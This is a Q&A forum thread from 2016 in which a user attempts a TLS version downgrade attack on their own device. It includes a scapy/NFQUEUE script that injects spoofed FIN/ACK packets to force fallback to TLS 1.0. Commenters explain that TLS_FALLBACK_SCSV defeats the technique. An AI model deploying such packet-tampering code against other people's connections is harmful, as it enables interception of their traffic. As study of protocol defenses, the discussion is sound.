1

I know it won't work on every server because some don't allow SSLv3 but I tried many servers and my attack doesn't seem to work.

For now, I attempt to downgrade to TLS 1.0 (also recognized by the number 769 in the protocol).

I have a full MITM setup with the ability to intercept packets as my wish. Now, I have a script filtering packets for me and so every time the victim (even though it's just my own personal device) tries to send a ClientHello I check the version of the conversation it is trying to initiate - if the number is bigger than 769 (TLS 1.0) I send a FIN, ACK message in the name of the server.

Now, the client attempts at connecting again but this time with a lower version and so on - until reaching TLS 1.0 (769) and then I accept the packet and let the connection go on.

The problem is that the server sends Alert (Level: Fatal, Description: Inappropriate Fallback) in response. Does this have to do with the server not supporting TLSv1? Because I have a hard time believing any decent server these days doesn't support TLSv1.

Now, in the article I quoted - they show they downgraded facebook. For some reason, it doesn't work in my setup - here is my setup (am using libnfqueue and scapy):

def print_and_accept(pkt):
    spkt = IP(pkt.get_payload())

    if re.search('\x16\x03\x01.{2}\x01', str(spkt), flags=0): #Checking for TLS Client Hello
        if spkt[TLSClientHello].version > 769: #tlsv1 - although should actually be sslv3, not tlsv1
            new_packet = IP(dst=spkt[IP].dst, src=spkt[IP].src)/TCP() #FIN, ACK packet
            new_packet[TCP].sport = spkt[TCP].sport
            new_packet[TCP].dport = spkt[TCP].dport
            new_packet[TCP].seq = spkt[TCP].seq
            new_packet[TCP].ack = spkt[TCP].ack
            new_packet[TCP].flags = 'FA' #Setting flags to fin, ack
            pkt.set_payload(str(new_packet))
    pkt.accept()
Limit
  • 3,191
  • 1
  • 16
  • 35
Zach P
  • 131
  • 4
  • This might be your answer - http://security.stackexchange.com/a/81071/37973 – Peteris Nov 02 '16 at 15:04
  • @Peteris In which case, how does one perform a downgrade attack? – Zach P Nov 03 '16 at 08:52
  • 1
    As for almost any other attack - you perform it on those servers that are vulnerable to it due to their negligence, and you can't perform it on properly configured servers. If an article shows that they downgraded e.g. facebook, then it's not reasonable to assume that facebook is still vulnerable to it. – Peteris Nov 03 '16 at 13:34
  • @Peteris Are you certain? I'm having a hard time believing Facebook doesn't support SSLv3, nor does google - even TLS. Because how fan this fallback be so reliable? Why doesn't simply removing its trace from the cipher suites list work? – Zach P Nov 03 '16 at 14:03
  • 1
    Re-read the linked answer or https://tools.ietf.org/html/draft-ietf-tls-downgrade-scsv-03 - even when retrying at TLSv1 or SSLv3 level, the client indicates in a particular field that it *can* support TLSv1.2, and the server can reject inappropriate fallback. The fix is 1.5 years old, all modern browsers should have that. – Peteris Nov 03 '16 at 15:42

0 Answers0